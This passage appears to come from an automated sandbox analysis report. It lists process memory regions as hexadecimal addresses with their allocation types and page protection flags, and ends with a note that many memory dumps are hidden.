remote allocation
page read and write
5683000
heap
page read and write
326E000
stack
page read and write
7738000
heap
page read and write
734E000
stack
page read and write
3094000
heap
page read and write
53F0000
trusted library allocation
page read and write
2B0F000
heap
page read and write
2A87000
heap
page read and write
2AFA000
heap
page read and write
35E0000
heap
page read and write
2AA1000
heap
page read and write
60AC000
stack
page read and write
4D81000
heap
page read and write
3271000
trusted library allocation
page read and write
21A8F843000
heap
page read and write
31A5000
trusted library allocation
page execute and read and write
4D61000
heap
page read and write
7E2000
heap
page read and write
21A94E60000
trusted library allocation
page read and write
2B67D7E000
unkown
page readonly
5670000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
2B0F000
heap
page read and write
2B03000
heap
page read and write
2936585B000
heap
page read and write
7FC90000
trusted library allocation
page execute and read and write
3294000
heap
page read and write
563E000
stack
page read and write
21A9510A000
heap
page read and write
2FCA000
heap
page read and write
2B6767E000
stack
page read and write
7A2000
heap
page read and write
4BDF000
stack
page read and write
580000
heap
page read and write
4FBE000
stack
page read and write
5BF3000
heap
page read and write
4D61000
heap
page read and write
2AE4000
heap
page read and write
29365800000
heap
page read and write
5395000
trusted library allocation
page read and write
805000
heap
page read and write
2AE2000
heap
page read and write
31A2000
trusted library allocation
page read and write
4D81000
heap
page read and write
44FE000
stack
page read and write
5251000
heap
page read and write
4D9F000
heap
page read and write
5A61000
heap
page read and write
5A77000
heap
page read and write
5251000
heap
page read and write
4C10000
heap
page read and write
4DA2000
heap
page read and write
84C000
heap
page read and write
2A99000
heap
page read and write
4D7D000
heap
page read and write
90E000
stack
page read and write
867E000
stack
page read and write
12F0000
heap
page read and write
29365854000
heap
page read and write
5A41000
heap
page read and write
82D000
heap
page read and write
363E000
stack
page read and write
4D75000
heap
page read and write
4D75000
heap
page read and write
4D8E000
heap
page read and write
A30000
heap
page read and write
21A90104000
heap
page read and write
21A94E50000
trusted library allocation
page read and write
4D87000
heap
page read and write
5A89000
heap
page read and write
5251000
heap
page read and write
21A90300000
trusted library allocation
page read and write
2895000
heap
page read and write
818000
heap
page read and write
7D0000
heap
page read and write
BDE000
stack
page read and write
29365842000
heap
page read and write
4D86000
heap
page read and write
21A96000000
heap
page read and write
29365873000
heap
page read and write
3094000
heap
page read and write
305F000
heap
page read and write
568A000
heap
page read and write
21A9505B000
heap
page read and write
3080000
heap
page read and write
4E2E000
stack
page read and write
4560000
heap
page read and write
2F40000
heap
page read and write
4D6C000
heap
page read and write
21A8F913000
heap
page read and write
82D000
heap
page read and write
4DAD000
heap
page read and write
4D83000
heap
page read and write
52A2000
trusted library allocation
page read and write
5251000
heap
page read and write
2A98000
heap
page read and write
3094000
heap
page read and write
4D81000
heap
page read and write
4D86000
heap
page read and write
5251000
heap
page read and write
51E2000
trusted library allocation
page read and write
2A86000
heap
page read and write
283E000
stack
page read and write
3095000
heap
page read and write
4D76000
heap
page read and write
4D30000
heap
page read and write
3095000
heap
page read and write
21A94DA4000
trusted library allocation
page read and write
6620000
heap
page read and write
7D0000
heap
page read and write
2A80000
heap
page read and write
3094000
heap
page read and write
21A8F902000
heap
page read and write
4D81000
heap
page read and write
4D7E000
heap
page read and write
4D87000
heap
page read and write
21A8F7E0000
trusted library allocation
page read and write
2ADC000
heap
page read and write
2A49000
heap
page read and write
84C0000
heap
page read and write
59BB000
heap
page read and write
4DC0000
heap
page read and write
21A8F8A0000
heap
page read and write
5A18000
heap
page read and write
29365826000
heap
page read and write
781000
heap
page read and write
2936586A000
heap
page read and write
4D81000
heap
page read and write
3094000
heap
page read and write
2AAB000
heap
page read and write
4D75000
heap
page read and write
5210000
heap
page read and write
3090000
heap
page read and write
8430000
trusted library allocation
page read and write
4D81000
heap
page read and write
4D83000
heap
page read and write
3FF0000
heap
page read and write
125E000
heap
page read and write
5251000
heap
page read and write
4F61000
trusted library allocation
page read and write
5273000
trusted library allocation
page read and write
50BE000
stack
page read and write
4D81000
heap
page read and write
21A94D90000
trusted library allocation
page read and write
3294000
heap
page read and write
82D000
heap
page read and write
4D81000
heap
page read and write
21A8F8AA000
heap
page read and write
3269000
trusted library allocation
page read and write
4D94000
heap
page read and write
4DE4000
heap
page read and write
2B68D7E000
unkown
page readonly
ED7A17E000
unkown
page readonly
4D78000
heap
page read and write
ED7A07E000
stack
page read and write
781000
heap
page read and write
C2F000
heap
page read and write
5B72000
heap
page read and write
4D75000
heap
page read and write
73CE000
stack
page read and write
9A48000
heap
page read and write
740B000
stack
page read and write
3095000
heap
page read and write
45A0000
heap
page read and write
714E000
stack
page read and write
5F69000
trusted library allocation
page read and write
2936588E000
heap
page read and write
21A8F8FF000
heap
page read and write
2A73000
heap
page read and write
4D60000
heap
page read and write
21A90002000
heap
page read and write
2936585E000
heap
page read and write
553F000
stack
page read and write
3094000
heap
page read and write
587E000
stack
page read and write
4D65000
heap
page read and write
367D000
heap
page read and write
21A94D60000
trusted library allocation
page read and write
4D7E000
heap
page read and write
21A94E90000
trusted library allocation
page read and write
4D99000
heap
page read and write
3294000
heap
page read and write
4D9F000
heap
page read and write
2AA0000
heap
page read and write
2936586F000
heap
page read and write
11E0000
heap
page read and write
5F61000
trusted library allocation
page read and write
573C000
stack
page read and write
5971000
heap
page read and write
52C000
stack
page read and write
4D64000
heap
page read and write
21A9011A000
heap
page read and write
5CBE000
stack
page read and write
21A8F902000
heap
page read and write
49E4000
heap
page read and write
5723000
heap
page read and write
4D7E000
heap
page read and write
4D85000
heap
page read and write
2AB9000
heap
page read and write
34DE000
stack
page read and write
803000
heap
page read and write
50B8000
trusted library allocation
page read and write
4FB7000
trusted library allocation
page read and write
4DA2000
heap
page read and write
9900000
trusted library section
page read and write
5251000
heap
page read and write
2DBC000
stack
page read and write
4D61000
heap
page read and write
324F000
stack
page read and write
2B67C7B000
stack
page read and write
7E4000
heap
page read and write
2AA4000
heap
page read and write
4D70000
heap
page read and write
4D70000
heap
page read and write
4DA5000
heap
page read and write
21A950B3000
heap
page read and write
7FC000
heap
page read and write
21A95000000
heap
page read and write
3280000
trusted library allocation
page execute and read and write
4D81000
heap
page read and write
3094000
heap
page read and write
608C000
stack
page read and write
322F000
stack
page read and write
3095000
heap
page read and write
29365902000
heap
page read and write
5A0B000
heap
page read and write
293657E0000
heap
page read and write
21A94D80000
trusted library allocation
page read and write
800000
heap
page read and write
21A9510C000
heap
page read and write
3056000
heap
page read and write
79D0000
trusted library allocation
page read and write
3276000
trusted library allocation
page read and write
21A8F8B8000
heap
page read and write
21A8F86C000
heap
page read and write
79F0000
trusted library allocation
page read and write
7AD000
heap
page read and write
29366002000
trusted library allocation
page read and write
ED7987E000
unkown
page readonly
4D81000
heap
page read and write
351F000
stack
page read and write
4D7D000
heap
page read and write
21A94D60000
trusted library allocation
page read and write
53B1000
trusted library allocation
page read and write
564F000
stack
page read and write
3095000
heap
page read and write
83F0000
heap
page read and write
5BFC000
heap
page read and write
7C8000
heap
page read and write
4D61000
heap
page read and write
4D7E000
heap
page read and write
4D69000
heap
page read and write
5B85000
heap
page read and write
5A6C000
heap
page read and write
4D61000
heap
page read and write
21A95066000
heap
page read and write
4D85000
heap
page read and write
3290000
heap
page read and write
2936586E000
heap
page read and write
2A86000
heap
page read and write
2A28000
heap
page read and write
77E0000
trusted library allocation
page read and write
326C000
trusted library allocation
page read and write
4D60000
heap
page read and write
4DE4000
heap
page read and write
4D8A000
heap
page read and write
1E0000
heap
page read and write
4EB0000
heap
page read and write
5251000
heap
page read and write
2AAE000
heap
page read and write
2D7F000
stack
page read and write
2AA9000
heap
page read and write
1226000
heap
page read and write
21A90102000
heap
page read and write
21A950DF000
heap
page read and write
2E6C000
heap
page read and write
5180000
heap
page read and write
4D9D000
heap
page read and write
3094000
heap
page read and write
2936583E000
heap
page read and write
2FB0000
trusted library allocation
page read and write
21A94CE0000
trusted library allocation
page read and write
3670000
heap
page read and write
4ACC000
stack
page read and write
718F000
stack
page read and write
4D8C000
heap
page read and write
4D6C000
heap
page read and write
77DE000
stack
page read and write
3095000
heap
page read and write
4D8A000
heap
page read and write
45C0000
unclassified section
page execute and read and write
4D7E000
heap
page read and write
95E000
stack
page read and write
3290000
trusted library allocation
page read and write
5E0000
heap
page readonly
2F47000
heap
page read and write
4D7E000
heap
page read and write
21A94EA0000
trusted library allocation
page read and write
4D6C000
heap
page read and write
690000
heap
page read and write
353B000
heap
page read and write
2B09000
heap
page read and write
3539000
heap
page read and write
49E0000
heap
page read and write
4D6C000
heap
page read and write
2A93000
heap
page read and write
29365851000
heap
page read and write
7790000
trusted library allocation
page read and write
2A84000
heap
page read and write
510D000
stack
page read and write
2A20000
heap
page read and write
2D7C000
stack
page read and write
DA0000
heap
page read and write
3094000
heap
page read and write
5A2D000
heap
page read and write
4C19000
heap
page read and write
7F6000
heap
page read and write
4D9F000
heap
page read and write
5670000
trusted library allocation
page read and write
4D71000
heap
page read and write
29365852000
heap
page read and write
4DB4000
heap
page read and write
825000
heap
page read and write
5292000
trusted library allocation
page read and write
9712000
trusted library allocation
page read and write
4D61000
heap
page read and write
5DF4000
heap
page read and write
4D81000
heap
page read and write
4D9D000
heap
page read and write
5A55000
heap
page read and write
5BE8000
heap
page read and write
2D1E000
stack
page read and write
3294000
heap
page read and write
825000
heap
page read and write
5A08000
heap
page read and write
29365858000
heap
page read and write
5B85000
heap
page read and write
21A94D50000
trusted library allocation
page read and write
610A000
trusted library allocation
page read and write
323A000
stack
page read and write
2A49000
heap
page read and write
287E000
stack
page read and write
3250000
heap
page readonly
4D72000
heap
page read and write
2A7C000
heap
page read and write
2A89000
heap
page read and write
4D64000
heap
page read and write
9A34000
heap
page read and write
4D9E000
heap
page read and write
7970000
trusted library allocation
page read and write
7EB000
heap
page read and write
8400000
heap
page read and write
4D7E000
heap
page read and write
21A950F7000
heap
page read and write
4F1F000
stack
page read and write
42B000
stack
page read and write
DB0000
heap
page read and write
7C8000
heap
page read and write
BE0000
heap
page read and write
3530000
heap
page read and write
ED79D7E000
unkown
page readonly
21A8F88E000
heap
page read and write
74FF000
stack
page read and write
4D9D000
heap
page read and write
7A10000
trusted library allocation
page read and write
2AB0000
heap
page read and write
4100000
heap
page read and write
21A8F8B8000
heap
page read and write
2FC0000
heap
page read and write
5DD0000
heap
page read and write
293657D0000
heap
page read and write
21A95062000
heap
page read and write
2D3D000
stack
page read and write
76AD000
heap
page read and write
53A1000
heap
page read and write
21A8F82B000
heap
page read and write
4D7E000
heap
page read and write
21A94DC9000
trusted library allocation
page read and write
29365863000
heap
page read and write
2FA4000
trusted library allocation
page read and write
4D81000
heap
page read and write
7E6000
heap
page read and write
21A9504E000
heap
page read and write
805000
heap
page read and write
6F9F000
stack
page read and write
2A63000
heap
page read and write
5D0000
heap
page read and write
3094000
heap
page read and write
710000
heap
page read and write
21A94DA0000
trusted library allocation
page read and write
DE0000
heap
page read and write
21A8F867000
heap
page read and write
2AF3000
heap
page read and write
52BD000
trusted library allocation
page read and write
21A95055000
heap
page read and write
4DF0000
heap
page read and write
825000
heap
page read and write
82D000
heap
page read and write
29365813000
heap
page read and write
7D2000
heap
page read and write
4A0000
heap
page read and write
4C0E000
stack
page read and write
94E000
stack
page read and write
45E000
system
page execute and read and write
2AB0000
heap
page read and write
5AA0000
heap
page read and write
2B6857E000
unkown
page readonly
29365855000
heap
page read and write
9C0000
heap
page read and write
5A24000
heap
page read and write
4D71000
heap
page read and write
7CC000
stack
page read and write
5670000
trusted library allocation
page read and write
7EE000
heap
page read and write
7EC000
heap
page read and write
5EF4000
trusted library allocation
page read and write
84A000
heap
page read and write
5A0B000
heap
page read and write
29365840000
heap
page read and write
2A99000
heap
page read and write
2A99000
heap
page read and write
3294000
heap
page read and write
64CA000
trusted library allocation
page read and write
B4E000
stack
page read and write
7FB000
heap
page read and write
7960000
trusted library allocation
page read and write
5BFC000
heap
page read and write
21A94D61000
trusted library allocation
page read and write
7F9000
heap
page read and write
ED79AFE000
stack
page read and write
C2F000
stack
page read and write
9910000
trusted library allocation
page read and write
BE0000
heap
page read and write
5A2B000
heap
page read and write
4D8C000
heap
page read and write
4D81000
heap
page read and write
4D8E000
heap
page read and write
4D75000
heap
page read and write
5251000
heap
page read and write
4D8A000
heap
page read and write
31A0000
trusted library allocation
page read and write
41B000
system
page execute and read and write
5980000
remote allocation
page read and write
5251000
heap
page read and write
79C0000
trusted library allocation
page read and write
4D81000
heap
page read and write
4D99000
heap
page read and write
5990000
heap
page read and write
5F8C000
stack
page read and write
4D81000
heap
page read and write
21A90100000
heap
page read and write
701F000
stack
page read and write
5BF0000
heap
page read and write
12E0000
heap
page read and write
5670000
trusted library allocation
page read and write
5680000
trusted library allocation
page read and write
2936584F000
heap
page read and write
61AC000
stack
page read and write
7714000
heap
page read and write
3094000
heap
page read and write
847D000
stack
page read and write
5251000
heap
page read and write
4BCE000
stack
page read and write
793D000
stack
page read and write
52B1000
trusted library allocation
page read and write
3294000
heap
page read and write
849000
heap
page read and write
3016000
stack
page read and write
2B67477000
stack
page read and write
77F0000
trusted library allocation
page read and write
21A94F00000
remote allocation
page read and write
5040000
trusted library allocation
page read and write
3094000
heap
page read and write
3035000
heap
page read and write
2E60000
heap
page read and write
5251000
heap
page read and write
BDD000
stack
page read and write
525F000
heap
page read and write
21A950E8000
heap
page read and write
3094000
heap
page read and write
4DC3000
heap
page read and write
76F1000
heap
page read and write
21A94EB0000
trusted library allocation
page read and write
5251000
heap
page read and write
750000
heap
page read and write
7A2000
heap
page read and write
21A950EE000
heap
page read and write
312D000
stack
page read and write
2ECF000
stack
page read and write
3290000
heap
page readonly
4D71000
heap
page read and write
7E2000
heap
page read and write
5251000
heap
page read and write
21A950C2000
heap
page read and write
84F0000
trusted library allocation
page execute and read and write
781000
heap
page read and write
3094000
heap
page read and write
21A95104000
heap
page read and write
2B672FD000
stack
page read and write
4D69000
heap
page read and write
5BA2000
heap
page read and write
4DAA000
heap
page read and write
2EEF000
stack
page read and write
ED79F7E000
unkown
page readonly
2B6777E000
unkown
page readonly
3094000
heap
page read and write
29365860000
heap
page read and write
ED7977E000
unkown
page readonly
30EF000
stack
page read and write
5251000
heap
page read and write
2AFA000
heap
page read and write
2AB1000
heap
page read and write
2B0A000
heap
page read and write
4D81000
heap
page read and write
4D6C000
heap
page read and write
4DA2000
heap
page read and write
2F90000
trusted library allocation
page read and write
3094000
heap
page read and write
2A8C000
heap
page read and write
4D99000
heap
page read and write
53A0000
heap
page read and write
4D61000
heap
page read and write
5EF0000
trusted library allocation
page read and write
4D70000
heap
page read and write
461C000
unclassified section
page execute and read and write
4D7E000
heap
page read and write
816000
heap
page read and write
21A90820000
trusted library allocation
page read and write
585D000
heap
page read and write
B90000
heap
page read and write
C1A000
heap
page read and write
29365845000
heap
page read and write
4D7E000
heap
page read and write
2A73000
heap
page read and write
400000
system
page execute and read and write
53E000
stack
page read and write
2AF3000
heap
page read and write
4730000
heap
page read and write
5BA2000
heap
page read and write
C26000
heap
page read and write
71CD000
stack
page read and write
4D64000
heap
page read and write
521F000
stack
page read and write
4EB3000
heap
page read and write
5980000
remote allocation
page read and write
4D75000
heap
page read and write
8701000
trusted library allocation
page read and write
3094000
heap
page read and write
3094000
heap
page read and write
4D60000
heap
page read and write
7E7000
heap
page read and write
21A8F7A0000
heap
page read and write
4D7E000
heap
page read and write
21A953C0000
trusted library allocation
page read and write
3539000
heap
page read and write
4D81000
heap
page read and write
4D71000
heap
page read and write
31C0000
trusted library allocation
page read and write
5251000
heap
page read and write
3032000
stack
page read and write
21A94FF0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
21A9011A000
heap
page read and write
2FAD000
trusted library allocation
page execute and read and write
910000
heap
page read and write
21A8F7B0000
heap
page read and write
5670000
heap
page read and write
21A8F8FF000
heap
page read and write
4DAA000
heap
page read and write
2936585F000
heap
page read and write
4D69000
heap
page read and write
4B4E000
stack
page read and write
2ADC000
heap
page read and write
5856000
heap
page read and write
4D99000
heap
page read and write
2FFC000
heap
page read and write
3294000
heap
page read and write
597B000
heap
page read and write
29365892000
heap
page read and write
4B0E000
stack
page read and write
4D7E000
heap
page read and write
5DD1000
heap
page read and write
518D000
heap
page read and write
4D81000
heap
page read and write
3537000
heap
page read and write
4D1E000
stack
page read and write
4D6D000
heap
page read and write
3D4E000
stack
page read and write
842D000
trusted library allocation
page read and write
4D70000
heap
page read and write
490000
heap
page read and write
753E000
stack
page read and write
302F000
stack
page read and write
52DB000
trusted library allocation
page read and write
32B0000
heap
page read and write
4D9F000
heap
page read and write
21A8F813000
heap
page read and write
538D000
trusted library allocation
page read and write
21A8F894000
heap
page read and write
52AE000
trusted library allocation
page read and write
35DF000
stack
page read and write
2A73000
heap
page read and write
29365865000
heap
page read and write
3294000
heap
page read and write
2936586B000
heap
page read and write
2FEF000
heap
page read and write
4D7E000
heap
page read and write
21A94F00000
remote allocation
page read and write
4DE4000
heap
page read and write
32A0000
heap
page read and write
4D85000
heap
page read and write
55CF000
stack
page read and write
2ADC000
heap
page read and write
2A87000
heap
page read and write
2AFD000
heap
page read and write
2AB9000
heap
page read and write
21A94E30000
trusted library allocation
page read and write
4D9D000
heap
page read and write
3294000
heap
page read and write
21A95041000
heap
page read and write
599D000
heap
page read and write
4D9D000
heap
page read and write
710B000
stack
page read and write
4DA0000
heap
page read and write
800000
heap
page read and write
53E4000
trusted library allocation
page read and write
2E6C000
heap
page read and write
4D83000
heap
page read and write
There are 1058 hidden memdumps, click here to show them.